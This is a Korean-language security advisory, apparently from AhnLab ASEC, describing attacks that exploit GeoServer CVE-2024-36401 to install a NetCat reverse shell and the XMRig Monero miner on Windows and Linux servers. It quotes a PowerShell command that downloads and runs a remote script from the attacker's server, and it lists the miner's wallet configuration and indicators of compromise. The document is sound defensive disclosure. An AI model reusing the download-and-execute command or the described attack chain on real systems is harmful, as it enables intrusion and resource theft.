GeoServer 취약점을 악용하는 코인 마이너 공격 사례

AhnLab SEcurity intelligence Center(ASEC)은 취약점이 패치되지 않은 GeoServer가 최근까지도 지속적인 공격 대상이 되고 있는 것을 확인하였다. 공격자는 취약한 GeoServer를 스캐닝한 후 코인 마이너를 설치하고 있는 것으로 보이며 이를 통해 국내에서도 감염 사례를 확인할 수 있었다.

 

1. GeoServer 원격 코드 실행 취약점 (CVE-2024-36401)

GeoServer는 Java로 작성된 오픈소스 GIS(Geographic Information System) 서버로서 지리 공간 데이터 처리 기능을 지원하는 플랫폼이다. 2024년 인증되지 않은 사용자가 원격 코드를 실행할 수 있는 취약점 CVE-2024-36401가 공개되었으며 이후 다양한 공격자들이 이를 악용해 악성코드를 설치하고 있다.

2024년 9월 Fortinet사는 CVE-2024-36401 취약점을 악용해 GOREVERSE, SideWalk, Mirai, Condi, CoinMiner 등의 악성코드들을 유포하는 공격 사례들을 공개하였다. [1] 그리고 TrendMicro사에서도 Earth Baxia 공격자의 공격 캠페인을 공개하였는데 대만의 지역 기관을 대상으로 스피어 피싱과 함께 CVE-2024-36401 취약점이 악용된 것으로 알려졌다. [2]

 

2. 국내 공격 사례

국내의 경우 GeoServer가 설치된 윈도우 환경이 그 대상이었으며 설치된 GeoServer가 CVE-2024-36401 취약점이 패치되지 않은 버전인 것을 보면 악성코드 설치 과정에서 CVE-2024-36401 취약점이 악용되었을 가능성이 높다. 공격자는 취약점을 악용해 파워쉘 명령을 실행하였으며 최종적으로 NetCat과 XMRig 코인 마이너를 설치하였다.

Figure 1. 취약점 공격으로 실행된 파워쉘 프로세스

 

2.1. NetCat

공격자는 최초 침투 과정에서 다운로더 기능을 담당하는 파워쉘 명령을 실행하는데 먼저 파워쉘 스크립트 “adminc.ps1″을 다운로드해 NetCat을 설치한다. Netcat은 TCP / UDP 프로토콜로 연결된 네트워크 상에서 특정 대상과 데이터를 송수신하게 해주는 유틸리티이지만 원격 쉘로서 악용 가능하다는 점 때문에 공격자가 감염 시스템을 제어하기 위한 목적으로 악용하기도 한다. “-e” 인자를 통해 실행된 NetCat은 C&C 서버에 접속하여 리버스 쉘로서 동작하며 공격자는 C&C 서버에서 감염 시스템을 제어할 수 있게 된다.

Figure 2. NetCat 설치 루틴

 

2.2. XMRig

악성코드 유포 주소에서는 XMRig를 설치하는 파워쉘 스크립트와 Bash 스크립트가 모두 확인된다. 공격자는 GeoServer가 설치된 운영체제에 따라 각각의 스크립트를 이용해 XMRig를 설치한 것으로 추정된다. 윈도우 환경에서는 취약한 GeoServer가 다음과 같은 파워쉘 명령을 실행하였으며 다운로드된 파워쉘 스크립트가 XMRig를 설치하였다.

> IEX(New-ObjectNet.WebClient).DownloadString(‘hxxp://182.218.82.[1]4/js/1/gw.txt’)

Figure 3. XMRig를 설치하는 파워쉘 스크립트

리눅스 대상 공격 사례에서는 Bash 스크립트가 악용될 것으로 추정되며 윈도우 대상 공격 사례와 유사하게 XMRig와 설정 파일을 다운로드한다. Bash 악성코드는 경쟁 코인 마이너 악성코드들로 추정되는 프로세스들을 종료하며 “startup.sh”를 실행하여 XMRig를 실행한다.

Figure 4. XMRig를 설치하는 Bash 스크립트

Bash 스크립트는 이외에도 지속성 유지를 위해 Cron 작업에 명령을 등록하는데 해당 명령은 Pastebin에서 다운로드한 스크립트를 실행하는 기능을 담당한다.

Figure 5. Pastebin에서 추가 명령을 실행하는 Cron 작업

• url : pool.supportxmr.com:443
• user :  47DsNc5pK8rYBQF4ev3mNBct3tkkHuUmxeqCSSbX3YuBhXweSB9XeQbcPMqEBaSJy4bGrPxbdMJkphrVQ5AmastoEMpSjcU
• pass : x

 

3. 결론

GeoServer의 원격 코드 실행 취약점(CVE-2024-36401)이 공개된 이후 최근까지도 해당 취약점을 악용해 악성코드를 설치하는 사례들이 확인되고 있다. 공격자는 윈도우와 리눅스 환경을 포함해 취약한 GeoServer가 설치된 환경을 공격 대상으로 하고 있으며 NetCat과 XMRig 코인 마이너를 설치하였다. 코인 마이너가 설치될 경우 시스템의 자원을 이용해 공격자의 모네로 코인을 채굴하게 되며, 공격자는 추후 함께 설치한 NetCat을 이용해 또 다른 악성코드를 설치하거나 시스템 내의 정보를 탈취하는 등 다양한 악성 행위를 수행할 수 있다.

 

MD5

0b3744373c32dc6de80dfc081200d9f8

310c17c19e90381114d47914bcb3ccf2

523613a7b9dfa398cbd5ebd2dd0f4f38

5e84c2bcca9486b6416a8b27ed4d845e

615b348974fb3b5aea898a172fadecf4

URL

http[:]//182[.]218[.]82[.]14/js/1/config[.]json

http[:]//182[.]218[.]82[.]14/js/1/gl[.]txt

http[:]//182[.]218[.]82[.]14/js/1/gw[.]txt

http[:]//182[.]218[.]82[.]14/js/1/s[.]rar

http[:]//182[.]218[.]82[.]14/js/1/startup[.]sh

IP

107[.]180[.]100[.]247